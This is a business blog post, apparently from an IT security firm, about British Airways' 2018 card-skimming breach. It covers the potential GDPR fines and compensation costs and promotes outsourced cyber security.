Why British Airways’ data breach could cost the business over £1 billion

British Airways is the latest business to disclose a large data breach, informing 380,000 customers on Thursday that their credit card details had been stolen. The credit card information included card numbers, expiry dates and security codes.

In addition to credit card information, it’s thought that hackers also gained access to names, email and home addresses. Unlike a number of recent data breaches, the customers affected are those who booked via the BA website or app in a short 15-day window, meaning the details stolen were those entered by paying customers in that timeframe rather than saved data.

British Airways has called the act “data theft” rather than a data breach and stated that it was a “very sophisticated, malicious criminal attack on our website”. It’s important to note, however, that this “data theft” technically qualifies as a data breach as confidential information was released to an untrusted environment.

Today, it has been revealed that a skimming tool was added to the British Airways website, with experts stating it is similar to the malware that caused the Ticketmaster breach through its third-party live chat add-on. The tool scrapes credentials entered into the online booking form, sending them to the hackers’ server when the booking form is submitted.

BA’s plan to improve its cyber security

What’s particularly interesting about this case is that British Airways had been on the verge of appointing an outsourced provider to look after its IT security. According to a leaked internal memo from BA’s Group IT Service Effectiveness Manager, “internal and external reports undertaken highlight that further investment is required in cyber security across IAG to provide a group-wide strategic and proactive approach.”

There are many reasons why outsourced IT security is the smart solution for businesses looking to not only comply with legislation like GDPR, but to follow best practice and keep their data safe and their systems up-and-running. Not only will businesses have access to a wider pool of cyber security experts than they would hiring in-house, they’ll also be able to focus on growth unencumbered by costly in-house engineers. What’s more, you can tap into the expertise of your external security partner to understand how your employees can be vigilant in the face of an ever-increasing cyberthreat landscape.

It’s clear that BA identified the need to bolster its cyber security, but it might be a case of too little, too late. A number of outlets are reporting that BA could face a steep penalty from the Information Commissioner’s Office (ICO), the governing body responsible for regulating compliance with GDPR; The Times reports that the fine could be around £500 million.

The potential cost to British Airways

BA could be fined under GDPR for failing to put in place “reasonable measures” to protect this sensitive information from being leaked; its internal investigations found that the business’ cyber security practices were lacking, but the company didn’t implement its fix – outsourced cyber security – in time for GDPR.

The company has complied with the reporting requirements of GDPR by reporting the breach not only to the relevant authorities, including the ICO, but by contacting its affected customers. The company has issued guidance for those affected, including a warning of phishing attacks off the back of the breach. In the wake of the cyber-attack, BA has advised that fraudsters are likely to get in touch with affected customers purporting to be British Airways in an attempt to gather more personal information.

BA’s history with IT failures

This isn’t the first time British Airways has been caught out due to its reportedly poor IT practices. Last year, an IT shutdown affected 75,000 customers through flight cancellations and disrupted customer services. The company had to pay out an estimated £100 million in compensation; something that’s likely to happen this time around too. In addition to reimbursing any customers whose cards have been successfully used by fraudsters, BA could be liable to pay every affected customer, even those whose details haven’t been fraudulently used, non-material damage of £1,250 each; that amounts to £475 million according to law form SPG.

One thing BA got right was its reporting. The hack was disclosed to both the relevant authorities and affected customers within about 24 hours of discovery – well within the 72-hour deadline specified by the ICO. Failure to do so will result in a fine of 2% of global annual turnover. Businesses should take heed of this and ensure that any breaches are reported promptly; failure to comply with this key regulation could carry a higher penalty than experiencing a breach itself, providing the business took measures to protect its data.

How can I protect my business?

With all that in mind, it looks like this could be an incredibly expensive data breach for British Airways. It looks like the company had identified the need to improve its IT security, but wasn’t suitably prepared for the GDPR deadline. Whilst the forthcoming plan to outsource its cyber security functions – which is a smart move that would save money and ensure the business had access to the best in the business – was in the works, it wasn’t implemented quickly enough.

That doesn’t mean that, if your business hasn’t undertaken an exercise to identify weak points in your IT security already, that it’s too late. However, this example should illustrate to you how important it is that your business complies with GDPR. Doing something is better than doing nothing is the message you really need to heed. The ICO has handed out a number of fines in the hundreds of thousands since the GDPR deadline, but if the reports are right, this could be the biggest post-GDPR fine handed out yet.